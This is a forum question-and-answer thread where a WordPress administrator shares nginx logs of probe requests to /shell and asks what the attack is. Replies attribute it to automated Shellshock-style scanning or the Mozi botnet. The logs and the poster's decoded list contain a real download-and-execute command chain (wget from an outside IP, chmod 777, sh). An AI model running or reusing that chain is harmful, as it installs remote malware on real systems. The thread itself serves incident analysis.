Which type of hacking attempt is this? Acessing inexistent shell file from inexistent URL

Question

I use Wordpress on my site, recently I blocked a hacker that infected my site with A LOT of backdoors (thousands of backdoors, literally). I spend one and a half month to bet him. It wasn't my fault, the guy who was on my job before me never had updated the site.

After this, I noticed some strange access to files that just don't exist, and I think that the hacker is trying to find known exploits from wordpress plugins that I don't use. It is ok, I don't care at all. But one of those tries cought me attention.

95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"

I am hiding part of URL, sorry.

The IPs always change, even with consecutive requests with less than one second of difference, maybe a DDoS. The user-agent commonly change too, there are everything here: iPhone, iPad, Android, Windows 7, 8, 10, Firefox, Google Chrome, Internet Explorer... But Linux and Mac. Those 3 requests are the only exception.

I noticed that there are some shell commands at the URL. These ones:

cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE HTTP/1.1

There are no folder or file with this name on my /tmp directory.

This "karin" URL was an old site that doens't exist a long time. I don't know how he knows this URL, even I didn't knew. Everytime I try to access some URL that is configured on NGINX, but path doens't exist like this karin, I got a 404 error. But those tries given 400 error.

404 is normal, it is because there are nothing here. But 400? It means that there are something here, but it couldn't process the data sent. I removed the nginx configuration to this URL, and I tried it in other URLs. I alway got a 404 error, I tried this:

***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"

So my question is: Should I be scared of this commands returning a 400 error on this URL? Why I can't reproduce this? Aparently those tries failed, should I be sure that they failed? Which type of attack is this? I never heard about a "shell script injection by URL" like this.

Answer 1

It is an automatic scan made by scripts looking for web servers with bashdoor vulnerabilities.

You can, as a precaution, block all urls that contain words like shell. This type of scan is common and a webserver firewall can easily handle attack prevention.

Answer 2

This looks like a request from the Mozi Botnet, a botnet that searches for backdoor shells on IoT devices.